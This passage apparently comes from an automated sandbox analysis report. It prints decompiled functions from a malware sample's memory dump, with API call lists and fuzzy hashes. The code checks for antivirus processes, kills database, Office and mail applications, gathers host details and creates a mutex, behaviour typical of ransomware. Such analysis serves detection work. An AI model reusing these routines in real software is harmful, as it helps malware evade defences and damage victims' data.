				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0FBB7B8D
VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0FBB7C01
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FBB7C16
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB7C2C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FBB7C4F
lstrcmpiW.KERNEL32(0FBC03AC,-00000024), ref: 0FBB7C75
Process32NextW.KERNEL32(?,?), ref: 0FBB7CEE
GetLastError.KERNEL32 ref: 0FBB7CF8
lstrlenW.KERNEL32(00000000), ref: 0FBB7D16
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB7D3B
FindCloseChangeNotification.KERNELBASE(?), ref: 0FBB7D40
VirtualFree.KERNELBASE(?,?,00008000), ref: 0FBB7D55

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID:
API String ID: 1411803383-0
Opcode ID: d3d9a29c9ffaac0ce764a2ddebb967094b5f159f5a21366969223e6e8fb0bdb2
Instruction ID: 61071f575adbba48ef3f0601e4a993d0f54490da5e92e83fbe6169304b2b1fd7
Opcode Fuzzy Hash: d3d9a29c9ffaac0ce764a2ddebb967094b5f159f5a21366969223e6e8fb0bdb2
Instruction Fuzzy Hash: 96518F71E00218EFCB209F95E848BAE7BB4FF89765F60419DE900BB281CBB45905CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB48C0 Relevance: 15.1, APIs: 10, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0FBB48C0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0FBB4A32
VirtualAlloc.KERNELBASE(00000000,0000022C,00003000,00000004), ref: 0FBB4A4C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FBB4A65
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FBB4A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FBB4A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FBB4AA4
CloseHandle.KERNEL32(00000000), ref: 0FBB4AB1
Process32NextW.KERNEL32(?,00000000), ref: 0FBB4ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB4AE3
FindCloseChangeNotification.KERNELBASE(?), ref: 0FBB4AEA

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID:
API String ID: 3023235786-0
Opcode ID: cb4dfb9ad5a3a0beee4db74af1e18e264a91b3f1dca1265d7f77525f7d5ec1c5
Instruction ID: c5c08fa5443bb71637cd1e669f020eb8575e506ee4d85c4b0a90f2d0db5fc39e
Opcode Fuzzy Hash: cb4dfb9ad5a3a0beee4db74af1e18e264a91b3f1dca1265d7f77525f7d5ec1c5
Instruction Fuzzy Hash: 34512CB6508340DFD6208F96AC487FABBE8FB81718F60498CE9955B252D7F09809CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB47D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0FBB3BC0: GetProcessHeap.KERNEL32(?,?,0FBB4807,00000000,?,00000000,00000000), ref: 0FBB3C5C

Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0FBB74B7
Part of subcall function 0FBB7490: GetUserNameW.ADVAPI32(00000000,?), ref: 0FBB74C8
Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0FBB74E6
Part of subcall function 0FBB7490: GetComputerNameW.KERNEL32 ref: 0FBB74F0
Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBB7510
Part of subcall function 0FBB7490: wsprintfW.USER32 ref: 0FBB7551
Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBB756E
Part of subcall function 0FBB7490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBB7592
Part of subcall function 0FBB7490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0FBB4810,?), ref: 0FBB75B6
Part of subcall function 0FBB7490: RegCloseKey.KERNELBASE(00000000), ref: 0FBB75D2

Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72F2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72FD
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7313
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB731E
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7334
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB733F
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7355
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(0FBB4B36,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7360
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7376
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7381
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7397
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73A2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73C1
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73CC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB482C
lstrcpyW.KERNEL32 ref: 0FBB484F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4856
CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB486E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB487A
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4881
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB489B

Strings

Global\, xrefs: 0FBB4849

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: c879c1ed698bdff9018ecbd131d29eb41bcd432f9a6d2800bde2148168d50893
Instruction ID: ea007263d69bd679a97ed35280931dac57722e3bbe7f5f97f9666f0207b94f44
Opcode Fuzzy Hash: c879c1ed698bdff9018ecbd131d29eb41bcd432f9a6d2800bde2148168d50893
Instruction Fuzzy Hash: 9821F671650311BBE124AB64EC4AFFF775CEB40B51F90066CBA05A70C1AED87905CEE5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB35C0 Relevance: 13.6, APIs: 9, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB35C0(intOrPtr __ecx, intOrPtr __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t12;
				void* _t14;
				long _t17;
				void* _t18;
				int _t21;
				void* _t25;
				char* _t29;
				void* _t37;
				void* _t39;

				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
				_t39 = _t12;
				if(_t39 != 0) {
					GetModuleFileNameW(0, _t39, 0x100);
					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t37 = _t14;
					if(_t37 != 0xffffffff) {
						_t17 = GetFileSize(_t37, 0);
						_v8 = _t17;
						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
						_t25 = _t18;
						if(_t25 != 0) {
							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
							if(_t21 != 0) {
								_t29 = _v8 - 1 + _t25;
								if( *_t29 != 0) {
									do {
										_t29 = _t29 - 1;
									} while ( *_t29 != 0);
									E0FBB34F0(_t29 + 1, _v20, _v16);
									_t32 =  !=  ? 1 : 0;
									_v12 =  !=  ? 1 : 0;
								}
							}
							VirtualFree(_t25, 0, 0x8000); // executed
						}
						CloseHandle(_t37);
					}
					VirtualFree(_t39, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t12;
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000A00,00003000,00000004,?,74CB6980), ref: 0FBB35E9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,74CF82B0), ref: 0FBB3600
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0FBB3616
GetFileSize.KERNEL32(00000000,00000000), ref: 0FBB3626
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0FBB3639
ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0FBB364C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB368D
CloseHandle.KERNEL32(00000000), ref: 0FBB3694
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB36A2

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocFree$CloseCreateHandleModuleNameReadSize
String ID:
API String ID: 2352497600-0
Opcode ID: adeac8b0f9ee1e25b6491ddc0047f132cabf03e3c46a4def8618b62142300343
Instruction ID: 1263c7a3bd62fd6d0f248c7be4c177082d46840af1bf464783a54d1c3edc154c
Opcode Fuzzy Hash: adeac8b0f9ee1e25b6491ddc0047f132cabf03e3c46a4def8618b62142300343
Instruction Fuzzy Hash: E321F931B403047BF7215BA59C86FEE7BACEB49721F240059FB05BA2C1DAF895118F54

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7D70 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB7D70(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7D89
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7D9B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DAD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DBF
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DD1
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DE3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DF5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7E07
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7E19
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7E31

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: fba0835658843b7a13869cae9b7a0b647e627c2dfd66d7182cb2d6540de07961
Instruction ID: 4f9dbf7ab1b9fd5af75ef2c79720a8b3854d7dabcf71d1a7341017d3b0cacd4f
Opcode Fuzzy Hash: fba0835658843b7a13869cae9b7a0b647e627c2dfd66d7182cb2d6540de07961
Instruction Fuzzy Hash: 8821AD30280B04AAE6765A15EC0AFF6B6A1FF80B45F75496CE2C1248F18BF57499DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB4A78 Relevance: 10.5, APIs: 7, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB4A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FBB4A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FBB4A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FBB4AA4
CloseHandle.KERNEL32(00000000), ref: 0FBB4AB1
Process32NextW.KERNEL32(?,00000000), ref: 0FBB4ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB4AE3
FindCloseChangeNotification.KERNELBASE(?), ref: 0FBB4AEA

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID:
API String ID: 3573210778-0
Opcode ID: 7a1b1e4af0d72cfb80d53ca0f604752017b82635951bd85f41f1a257d2311c19
Instruction ID: e368399e492b915ff351ff337be596fe84d4bcf17b8218ba6b12574f8a868644
Opcode Fuzzy Hash: 7a1b1e4af0d72cfb80d53ca0f604752017b82635951bd85f41f1a257d2311c19
Instruction Fuzzy Hash: 8101D632600211EFD7209F51BC89BFA73ACFB85312F714058FD09A7042EBE4A8168FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7410 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB7410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0fbb7426
0x0fbb7430
0x0fbb7484
0x0fbb7432
0x0fbb7435
0x0fbb7447
0x0fbb744f
0x0fbb7466
0x0fbb746f
0x0fbb747b
0x0fbb7451
0x0fbb7454
0x0fbb7457
0x0fbb7463
0x0fbb7463
0x0fbb744f

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7426
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7447
RegCloseKey.KERNELBASE(?,?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7457
